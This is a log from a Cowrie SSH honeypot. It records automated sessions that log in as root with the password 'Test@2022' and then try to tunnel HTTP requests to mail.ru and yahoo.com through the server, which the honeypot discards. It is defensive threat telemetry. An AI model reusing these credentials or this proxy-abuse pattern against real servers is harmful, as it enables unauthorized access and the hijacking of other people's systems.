{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":51484,"dst_ip":"1.2.3.4","dst_port":22,"session":"7a68fa18fbfa","protocol":"ssh","message":"New connection: 77.83.207.83:51484 (1.2.3.4:22) [session: 7a68fa18fbfa]","sensor":"my-vps","timestamp":"2025-08-31T03:45:49.787603Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:49.788424Z","src_ip":"77.83.207.83","session":"7a68fa18fbfa"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:49.839401Z","src_ip":"77.83.207.83","session":"7a68fa18fbfa"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-31T03:45:49.884537Z","src_ip":"212.227.235.229","session":"74fc0d1cee63"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:50.093516Z","src_ip":"77.83.207.83","session":"7a68fa18fbfa"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":5144,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:5144","sensor":"my-vps","timestamp":"2025-08-31T03:45:50.146131Z","session":"7a68fa18fbfa"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:50.197148Z","src_ip":"77.83.207.83","session":"7a68fa18fbfa"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":16019,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:16019","sensor":"my-vps","timestamp":"2025-08-31T03:45:50.341429Z","session":"7a68fa18fbfa"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:50.392452Z","src_ip":"77.83.207.83","session":"7a68fa18fbfa"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":4473,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:4473","sensor":"my-vps","timestamp":"2025-08-31T03:45:50.537343Z","session":"7a68fa18fbfa"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:50.588351Z","src_ip":"77.83.207.83","session":"7a68fa18fbfa"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:50.640552Z","src_ip":"77.83.207.83","session":"7a68fa18fbfa"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":51594,"dst_ip":"1.2.3.4","dst_port":22,"session":"a212efe18cf4","protocol":"ssh","message":"New connection: 77.83.207.83:51594 (1.2.3.4:22) [session: a212efe18cf4]","sensor":"my-vps","timestamp":"2025-08-31T03:45:50.691888Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:50.692744Z","src_ip":"77.83.207.83","session":"a212efe18cf4"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:50.745193Z","src_ip":"77.83.207.83","session":"a212efe18cf4"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:51.006355Z","src_ip":"77.83.207.83","session":"a212efe18cf4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":31068,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:31068","sensor":"my-vps","timestamp":"2025-08-31T03:45:51.059768Z","session":"a212efe18cf4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:51.112174Z","src_ip":"77.83.207.83","session":"a212efe18cf4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":13583,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:13583","sensor":"my-vps","timestamp":"2025-08-31T03:45:51.258807Z","session":"a212efe18cf4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:51.311873Z","src_ip":"77.83.207.83","session":"a212efe18cf4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"77.83.207.83","src_port":30036,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:30036","sensor":"my-vps","timestamp":"2025-08-31T03:45:51.458822Z","session":"a212efe18cf4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:51.511350Z","src_ip":"77.83.207.83","session":"a212efe18cf4"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:51.564877Z","src_ip":"77.83.207.83","session":"a212efe18cf4"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":51708,"dst_ip":"1.2.3.4","dst_port":22,"session":"4386945d20f6","protocol":"ssh","message":"New connection: 77.83.207.83:51708 (1.2.3.4:22) [session: 4386945d20f6]","sensor":"my-vps","timestamp":"2025-08-31T03:45:51.613943Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:51.624624Z","src_ip":"77.83.207.83","session":"4386945d20f6"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:51.664115Z","src_ip":"77.83.207.83","session":"4386945d20f6"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:51.915029Z","src_ip":"77.83.207.83","session":"4386945d20f6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":26341,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:26341","sensor":"my-vps","timestamp":"2025-08-31T03:45:51.965982Z","session":"4386945d20f6"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:45:51.976946Z","src_ip":"212.227.125.160","session":"06bc6d1c0b1f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:52.016254Z","src_ip":"77.83.207.83","session":"4386945d20f6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:45:52.038270Z","src_ip":"212.227.125.160","session":"06bc6d1c0b1f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":25072,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:25072","sensor":"my-vps","timestamp":"2025-08-31T03:45:52.160423Z","session":"4386945d20f6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:52.210644Z","src_ip":"77.83.207.83","session":"4386945d20f6"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"77.83.207.83","src_port":4664,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:4664","sensor":"my-vps","timestamp":"2025-08-31T03:45:52.352164Z","session":"4386945d20f6"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:52.402707Z","src_ip":"77.83.207.83","session":"4386945d20f6"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:52.453684Z","src_ip":"77.83.207.83","session":"4386945d20f6"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":51797,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3a851449538","protocol":"ssh","message":"New connection: 77.83.207.83:51797 (1.2.3.4:22) [session: a3a851449538]","sensor":"my-vps","timestamp":"2025-08-31T03:45:52.501857Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:52.502768Z","src_ip":"77.83.207.83","session":"a3a851449538"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:52.552180Z","src_ip":"77.83.207.83","session":"a3a851449538"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:52.799293Z","src_ip":"77.83.207.83","session":"a3a851449538"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":17787,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:17787","sensor":"my-vps","timestamp":"2025-08-31T03:45:52.849746Z","session":"a3a851449538"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:52.900288Z","src_ip":"77.83.207.83","session":"a3a851449538"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":14798,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:14798","sensor":"my-vps","timestamp":"2025-08-31T03:45:53.040326Z","session":"a3a851449538"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:53.089990Z","src_ip":"77.83.207.83","session":"a3a851449538"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"src_ip":"77.83.207.83","src_port":21514,"message":"direct-tcp connection request to 2001:4998:124:1507::f001:80 from 127.0.0.1:21514","sensor":"my-vps","timestamp":"2025-08-31T03:45:53.232625Z","session":"a3a851449538"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:124:1507::f001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:53.282397Z","src_ip":"77.83.207.83","session":"a3a851449538"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:53.332615Z","src_ip":"77.83.207.83","session":"a3a851449538"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":51896,"dst_ip":"1.2.3.4","dst_port":22,"session":"60d6814f0934","protocol":"ssh","message":"New connection: 77.83.207.83:51896 (1.2.3.4:22) [session: 60d6814f0934]","sensor":"my-vps","timestamp":"2025-08-31T03:45:53.382581Z"}
